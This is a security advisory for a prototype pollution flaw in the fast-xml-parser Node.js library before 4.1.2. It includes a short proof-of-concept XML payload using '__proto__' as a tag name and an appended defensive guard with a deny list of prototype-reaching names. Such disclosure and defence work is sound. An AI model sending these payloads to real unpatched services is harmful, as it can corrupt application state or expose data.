GitHub Advisory Database: GHSA-X3CC-X39P-42QX
Published: Jun 13, 2023 - 12:44 p.m.

fast-xml-parser vulnerable to Prototype Pollution through tag or attribute name

2023-06-13 12:44:34
CWE-1321
Source: GitHub Advisory Database (github.com)
Tags: prototype pollution, xmlparser, xmlbuilder, xmlvalidator, patch v4.1.2, workaround

CVSS3: 6.5

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.001
Percentile: 27.5%

Impact

As a part of this vulnerability, a user was able to pollute Object.prototype by supplying __proto__ as a tag or attribute name in the XML being parsed.

const { XMLParser, XMLBuilder, XMLValidator } = require("fast-xml-parser");

// Proof of concept from the advisory: the tag name __proto__ is used as an
// object key, so its children are written onto the prototype chain.
let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>";

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);

// On an unpatched version (< 4.1.2) this prints "hacked" even though the
// parsed object has no own property named "polluted".
console.log(jObj.polluted); // should return hacked

Patches

The problem has been patched in v4.1.2.

Workarounds

Users can check for `__proto__` in the XML string before passing it to the parser.
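The following is an added example implementing that workaround as a pre-parse guard; it is not code from fast-xml-parser or from the advisory. It rejects documents whose tag or attribute names could reach Object.prototype, and adds a runtime canary that reports any key that appears on Object.prototype after load. The function names, regexes and sample documents are assumptions for illustration; it needs no dependency and runs offline, so it can sit in front of fast-xml-parser < 4.1.2 or serve as a regression test after upgrading.

```javascript
// Added example for GHSA-X3CC-X39P-42QX, not code from fast-xml-parser or the
// GitHub advisory. Implements the advisory's workaround (check the XML string
// for __proto__ before parsing) as a deny-list guard on tag and attribute
// names, plus a canary that detects unexpected keys on Object.prototype.
// Function names, regexes and sample inputs below are my own assumptions.

// Names that, used as an object key, reach Object.prototype or its constructor.
const DANGEROUS_NAMES = new Set(["__proto__", "constructor", "prototype"]);

// Matches an opening or self-closing tag: group 1 is the tag name, group 2 the
// raw attribute text. This is a guard, not an XML parser; processing
// instructions (<?...?>), comments and DOCTYPE (<!...>) are skipped on purpose.
const TAG_RE = /<\s*([^\s\/>!?]+)([^>]*)>/g;
// Matches name="value" or name='value' inside the attribute text.
const ATTR_RE = /([^\s=\/"']+)\s*=\s*(?:"[^"]*"|'[^']*')/g;

// Returns every tag or attribute name in `xml` that is on the deny list.
function findDangerousNames(xml) {
  const hits = [];
  for (const m of xml.matchAll(TAG_RE)) {
    const tag = m[1];
    if (DANGEROUS_NAMES.has(tag)) hits.push({ kind: "tag", name: tag });
    for (const a of m[2].matchAll(ATTR_RE)) {
      const attr = a[1];
      if (DANGEROUS_NAMES.has(attr)) hits.push({ kind: "attribute", name: attr });
    }
  }
  return hits;
}

// True when the document contains no deny-listed tag or attribute names.
function isSafeToParse(xml) {
  return findDangerousNames(xml).length === 0;
}

// Runtime canary: snapshot Object.prototype's own keys at load time ...
const PROTO_BASELINE = new Set(Object.getOwnPropertyNames(Object.prototype));

// ... and report any key that has appeared since, i.e. a pollution indicator.
function newPrototypeKeys() {
  return Object.getOwnPropertyNames(Object.prototype).filter(
    (name) => !PROTO_BASELINE.has(name)
  );
}

// Constructed sample documents: the advisory's PoC shape plus two variants.
const SAMPLES = {
  pocTag: "<__proto__><polluted>hacked</polluted></__proto__>",
  pocAttribute: '<root __proto__="hacked"/>',
  benign: '<?xml version="1.0"?><root id="1"><item>ok</item></root>',
};

// Audits each sample and returns a name -> hit-list map, usable as a unit test.
function auditSamples(samples = SAMPLES) {
  const report = {};
  for (const [name, xml] of Object.entries(samples)) {
    report[name] = findDangerousNames(xml);
  }
  return report;
}

for (const [name, hits] of Object.entries(auditSamples())) {
  console.log(name, hits.length === 0 ? "safe to parse" : JSON.stringify(hits));
}
console.log("Object.prototype new keys:", newPrototypeKeys());
```

Call isSafeToParse(xml) and refuse the request when it returns false; the deny list covers constructor and prototype as well as __proto__ because the same key-as-property-name path applies to them. The canary is cheap enough to run after each parse in a test suite, and a non-empty result from newPrototypeKeys() is a clear signal that an input got through the guard.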

References

https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7

Affected configurations

Vulners
Node: fast-xml-parser_project / fast-xml-parser, Range < 4.1.2 (node.js)

Vendor: fast-xml-parser_project
Product: fast-xml-parser
Version: *
CPE: cpe:2.3:a:fast-xml-parser_project:fast-xml-parser:*:*:*:*:*:node.js:*:*
